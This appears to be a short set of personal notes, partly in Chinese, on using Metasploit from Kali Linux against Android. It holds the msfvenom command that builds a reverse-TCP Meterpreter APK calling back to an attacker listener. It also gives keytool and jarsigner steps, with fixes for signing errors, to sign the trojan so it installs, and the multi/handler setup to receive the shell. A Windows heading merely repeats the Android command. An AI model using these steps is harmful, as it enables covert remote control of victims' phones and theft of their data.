Metaspolt

Metasploit

Android

android
端口映射
sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.241.131 lport=9999 R > /home/kali/shell.apk

sudo apt install zipalign

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore shell.apk alias_name
private key algorithm is not c ompatible with signat
The security strength of SHA-1 digest algorithm is not sufficient for this key size

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keysize 1024 -validity 10000
jarsigner -verbose -sigalg SHA1withDSA -digestalg SHA1 -keystore my-release-key.Keystore shell.apk alias_name

jarsigner -verify -verbose -certs shell.apk

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.241.131
set lport 9999

windows

Kali使用Metasploit内、外网渗透windows系统
sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.241.131 lport=9999 R > /home/kali/shell.apk